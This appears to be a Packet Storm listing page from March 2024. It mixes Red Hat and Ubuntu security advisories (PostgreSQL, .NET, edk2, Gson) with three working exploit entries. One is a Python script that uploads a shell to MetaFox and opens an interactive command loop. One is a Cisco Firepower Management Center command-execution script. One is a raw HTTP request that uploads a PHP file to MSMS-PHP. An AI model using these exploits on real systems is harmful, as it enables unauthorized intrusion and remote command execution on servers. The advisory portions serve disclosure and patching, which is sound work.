Red Hat Security Advisory 2024-1314-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1314.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:15 security updateAdvisory ID:        RHSA-2024:1314-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1314Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1314-03

Red Hat Security Advisory 2024-1311-03 - An update for.NET 8.0 is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1311.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 8.0 security updateAdvisory ID:        RHSA-2024:1311-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1311Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-21392====================================================================Summary: An update for .NET 8.0 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.103 and .NET Runtime 8.0.3.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21392References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268266

Red Hat Security Advisory 2024-1311-03

Red Hat Security Advisory 2024-1310-03 - An update for.NET 8.0 is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1310.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 8.0 security updateAdvisory ID:        RHSA-2024:1310-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1310Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-21392====================================================================Summary: An update for .NET 8.0 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.103 and .NET Runtime 8.0.3.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21392References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268266

Red Hat Security Advisory 2024-1310-03

Red Hat Security Advisory 2024-1309-03 - An update for.NET 7.0 is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1309.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 7.0 security updateAdvisory ID:        RHSA-2024:1309-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1309Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-21392====================================================================Summary: An update for .NET 7.0 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.117 and .NET Runtime 7.0.17.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21392References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268266

Red Hat Security Advisory 2024-1309-03

Red Hat Security Advisory 2024-1308-03 - An update for.NET 7.0 is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1308.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 7.0 security updateAdvisory ID:        RHSA-2024:1308-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1308Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-21392====================================================================Summary: An update for .NET 7.0 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.117 and .NET Runtime 7.0.17.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21392References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268266

Red Hat Security Advisory 2024-1308-03

MetaFox versions 5.1.8 and below suffer from a remote shell upload vulnerability.

    #!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google Dork: "Social network for niche communities"# Exploit Author: The Joker# Vendor Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport requestsimport sysif len(sys.argv) != 4:   sys.exit("Usage: %s " % sys.argv[0])   requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] + "/api/v1/user/login"response = requests.post(endpoint, json={"username": sys.argv[2], "password": sys.argv[3]}, verify=False)json_response = json.loads(response.text)if not "access_token" in json_response:   sys.exit("Login failed!")print("Login success! Uploading shell")token = json_response["access_token"]endpoint = sys.argv[1] + "/api/v1/files"files = {"file[0]": ("wtf.php", "")}response = requests.post(endpoint, files=files, headers={"Authorization": "Bearer " + token}, verify=False)json_response = json.loads(response.text)if not "data" in json_response or not "url" in json_response["data"][0]:   sys.exit("Upload failed!")shell_url = json_response["data"][0]["url"]print("Shell uploaded at %s\n" % shell_url)while True:   command = input("$ ")   response = requests.post(shell_url, data={"command": command}, verify=False)   print(response.text)

MetaFox 5.1.8 Shell Upload

Ubuntu Security Notice 6692-1 - It was discovered that Gson incorrectly handled deserialization of untrusted input data. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6692-1  
March 12, 2024

libgoogle-gson-java vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Gson could be made to crash if it opened a specially crafted  
file.

Software Description:  
- libgoogle-gson-java: A Java serialization/deserialization library to convert   
Java Objects into JSON and back

Details:

It was discovered that Gson incorrectly handled deserialization of untrusted  
input data. If a user or an automated system were tricked into opening a  
specially crafted input file, a remote attacker could possibly use this issue  
to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   libgoogle-gson-java             2.8.8-1ubuntu0.1

Ubuntu 20.04 LTS:  
   libgoogle-gson-java             2.8.5-3+deb10u1build0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libgoogle-gson-java             2.8.5-3~18.04.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libgoogle-gson-java             2.4-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6692-1  
   CVE-2022-25647

Package Information:  
   https://launchpad.net/ubuntu/+source/libgoogle-gson-java/2.8.8-1ubuntu0.1

 https://launchpad.net/ubuntu/+source/libgoogle-gson-java/2.8.5-3+deb10u1build0.20.04.1

Ubuntu Security Notice USN-6692-1

Cisco Firepower Management Center suffers from an authenticated remote command execution vulnerability. Many versions spanning the 7.x.x.x and 6.x.x.x branches are affected.

# Exploit Title: [Cisco Firepower Management Center]  
# Google Dork: [non]  
# Date: [12/06/2023]  
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)  
# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]  
# CVE : [CVE-2023-20048]

import requests  
import json

# set the variables for the URL, username, and password for the FMC web services interface  
fmc_url = "https://fmc.example.com"  
fmc_user = "admin"  
fmc_pass = "cisco123"

# create a requests session to handle cookies and certificate verification  
session = requests.Session()  
session.verify = False

# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token  
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"  
response = session.post(token_url, auth=(fmc_user, fmc_pass))

# check the response status and extract the access token and refresh token from the response headers  
# set the access token as the authorization header for the subsequent requests  
try:  
    if response.status_code == 200:  
        access_token = response.headers["X-auth-access-token"]  
        refresh_token = response.headers["X-auth-refresh-token"]  
        session.headers["Authorization"] = access_token  
    else:  
        print("Failed to get tokens, status code: " + str(response.status_code))  
        exit()  
except Exception as e:  
    print(e)  
    exit()

# set the variable for the domain id  
# change this to your domain id  
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"

# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC  
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"  
response = session.get(devices_url)

# check the response status and extract the data as a json object  
try:  
    if response.status_code == 200:  
        data = response.json()  
    else:  
        print("Failed to get devices, status code: " + str(response.status_code))  
        exit()  
except Exception as e:  
    print(e)  
    exit()

# parse the data to get the list of device names and URLs  
devices = []  
for item in data["items"]:  
    device_name = item["name"]  
    device_url = item["links"]["self"]  
    devices.append((device_name, device_url))

# loop through the list of devices and send a GET request to the URL of each device to get the device details  
for device in devices:  
    device_name, device_url = device  
    response = session.get(device_url)

    # check the response status and extract the data as a json object  
    try:  
        if response.status_code == 200:  
            data = response.json()  
        else:  
            print("Failed to get device details, status code: " + str(response.status_code))  
            continue  
    except Exception as e:  
        print(e)  
        continue

    # parse the data to get the device type, software version, and configuration URL  
    device_type = data["type"]  
    device_version = data["metadata"]["softwareVersion"]  
    config_url = data["metadata"]["configURL"]

    # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability  
    # use the values from the affected products section in the security advisory  
    if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:  
        print("Device " + device_name + " is vulnerable to CVE-2023-20048")

        # create a list of commands that you want to execute on the device  
        commands = ["show version", "show running-config", "show interfaces"]  
        device_id = device_url.split("/")[-1]

        # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device  
        # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute  
        for command in commands:  
            command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command  
            response = session.post(command_url)

            # check the response status and extract the data as a json object  
            try:  
                if response.status_code == 200:  
                    data = response.json()  
                else:  
                    print("Failed to execute command, status code: " + str(response.status_code))  
                    continue  
            except Exception as e:  
                print(e)  
                continue

            # parse the data to get the result of the command execution and print it  
            result = data["result"]  
            print("Command: " + command)  
            print("Result: " + result)

    else:  
        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")

Cisco Firepower Management Center Remote Command Execution

MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

Red Hat Security Advisory 2024-1305-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1305.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:1305-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1305Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2023-45234====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for VirtualMachines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.Security Fix(es):* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45234References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258697

Tag

#js